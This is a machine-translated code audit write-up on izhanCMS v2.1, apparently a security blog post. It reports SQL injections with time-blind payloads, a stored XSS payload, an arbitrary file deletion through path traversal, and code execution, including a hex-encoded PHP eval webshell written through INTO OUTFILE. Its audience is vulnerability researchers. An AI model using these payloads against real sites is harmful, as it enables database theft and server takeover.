Love station CMS is an open source free CMS content management system, with open and flexible, safe and efficient, simple and beautiful! This time, we conducted code audit for izhancms? V2.1, and found the security vulnerability in the code.
Official website of izhancms: http://www.izhancms.com
Website source code version: love station CMS (zend6.0) v2.1
Source code download: http://www.izhancms.com/category/category/index/cid/1
Default background address: http://127.0.0.1/admin/admin/index
Default account password: at least six self setting admin passwords
Code analysis:
Vulnerability file location: line 89-102 of application / index / Controllers / indexcontroller.php:
The parameter ID obtained in this function is not protected by single quotation marks. It is spliced into SQL statements and then brought into the database for execution. As a result, there is a SQL injection vulnerability in the implementation of the program, which can be used by attackers to obtain database sensitive information
Interest.
Exploit:
According to the location of the vulnerability, a time blind injection payload is constructed: http://127.0.0.1/index/index/qrcodepreview? Id = 2 / * * / XOR / * * / if (substring (user(), 1,1) ='2 ', sleep (5,0) -- database data can be obtained directly using sqlmap:
Code analysis:
Vulnerability file location: line 68-96 of application / goods / Controllers / goodscontroller.php
In this function, the obtained parameter ID will be brought into the getlinkgoodsid function to query. Pay attention to the third circle
Where the parameter ID is spliced into the SQL statement, and then brought into the database for execution, there are SQL notes in this place
Enter. Let's follow up the getlinkgoodsid function:
Vulnerability file location: line 91-109 of application / goods / Models / goodsmodel.php:
The parameter ID obtained in this function is also spliced into the SQL statement, and then carried into the database for execution.
To sum up, there are two SQL statements splicing in parameter ID, which leads to SQL injection vulnerability in the implementation of the program. The attacker can use this vulnerability to obtain database sensitive information.
Exploit:
According to the location of the vulnerability, a time blind injection payload is constructed
http://127.0.0.1/goods/Goods/info?id=2 xor if('2'='2',sleep(5),0)--
You can run directly with sqlmap:
Too simple, code analysis is skipped.
Exploit:
Website front desk -- comments and Suggestions -- commenter -- submit payload: 222 < script > alert (/ XSS /) < script >
When the administrator views the message information in the background, JS script code will be triggered.
Code analysis:
Vulnerability file location 1: admin / application / extensions / Controllers / qrcodecontroller.php
Lines 235-246:
The parameter ID obtained in this function is spliced into SQL statement, and then brought into database for execution. There is SQL injection in this place.
Vulnerability file location 2: admin / application / webset / Controllers / managerlogcontroller.php
Lines 33-57:
Vulnerability file location 3: admin / application / webset / Controllers / adminusercontroller.php
Lines 37-69:
In this function, the obtained parameter keyword is also spliced into SQL statements without any filtering, and then brought into the database for execution, resulting in a SQL injection vulnerability in the implementation of the program, which can be used by attackers to obtain database sensitive information.
A similar situation exists for all search boxes in the basic background.
Exploit:
Vulnerability location 1: http://127.0.0.1/admin/extensions/qrcode/preview? Id = 2
You can run directly with sqlmap:
Location 2: log in to the background system settings log management search keyword
Location 3: log in to the background - permission setting - system administrator - Search - Keyword
There are almost the same problems in the background search box, so we will not verify them one by one.
Code analysis:
Vulnerability file location: admin / application / webset / Controllers / dbrecovercontroller.php
Follow up deletetable function:
Vulnerability file location: admin / application / webset / Models / tablemodel.php
In this function, get $save ﹣ path, process it, and then directly bring $filen ﹣ path into the delete function to execute, which leads to arbitrary file delete vulnerability in the implementation of the program, which can be used by attackers to delete arbitrary files.
Exploit:
Create test.txt in the root directory as a vulnerability test file
Log in to the background, submit the payload, and delete the test.txt file in the root directory
Payload:http://127.0.0.1/admin/webset/dbrecover/delete?tbname=../../../test.txt
Method 1: modify label file
Log in to the background - Template Management - label management - label list - modify tag.lib.php:
Payload:phpinfo();
Visit http://127.0.0.1/library/mainone/taglib/tags.lib.php to successfully trigger code execution vulnerability.
Mode 2: write webshell with SQL statement
Login background - system settings - database operation - SQL statement - execute SQL statement.
Problem: the input characters will be HTML entity encoded, so the traditional into outfile statement cannot be successfully written
file
Select '< PHP Eval ($_post [CMD]);? >' into outfile 'C: / www / 222aaa. PHP' write failed
Convert a sentence into hex code, and construct pyaload as follows:
SELECT 111222 INTO OUTFILE 'E:/study/WWW/iZhanCMS/2222.php' LINES
TERMINATED BY 0x3C3F70687020406576616C28245F504F53545B2761275D293B3F3E –
Write webshell successfully, control website server
This is a case of black box combined with white box, which is relatively comprehensive. There are children's shoes with research in this area. Welcome to discuss and exchange with each other.
Bypass
About Me
A network security enthusiast has a paranoid pursuit of technology. Committed to sharing original high-quality dry goods, including but not limited to: penetration testing, WAF bypass, code audit, security operation and maintenance.